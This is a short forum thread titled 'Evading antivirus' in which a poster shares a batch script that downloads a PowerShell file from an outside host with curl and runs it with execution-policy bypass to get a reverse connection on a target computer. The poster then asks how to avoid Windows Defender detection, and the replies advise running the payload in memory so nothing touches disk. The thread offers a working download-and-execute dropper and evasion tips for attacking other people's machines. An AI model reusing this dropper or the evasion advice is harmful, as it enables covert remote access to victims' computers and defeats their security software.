Evading antivirus – Digitalmunition




Home Forums Evading antivirus

This topic contains 1 reply, has 2 voices, and was last updated by  ShiroiOk 1 month, 1 week ago.

  • Author
    Posts
  • #336901

    anonymous
    Participant

    hey guys!!

    I have a .ps1 script which when executed on target computer give me the reverse connection.The problem is that you can’t run a ps1 file by directly clicking on it.So, I made a batch script which will execute the ps1 file , the code is pretty simple you can look at it.

    there is @ infront of echo but can’t able to put it(Reddit’s problem).

    echo off

    cd ..

    curl [http://www.xx.com/file.ps1](http://www.xx.com/file.ps1) -o %cd%\Appdata\local\file.ps1

    powershell -ep bypass %cd%\Appdata\local\hehe.ps1

    ​

    so , when i run this batch script it gives me reverse connection without any problem but when i convert this bat file to exe it get detected by window defender.

    so ,can u guys give me any tips on how to fix this.how can i get reverse connection without getting detected

  • #336902

    ShiroiOk

    Run in memory nothing dropped to disk

  • #336903

    straingebrue

    Don’t drop to disk

You must be logged in to reply to this topic.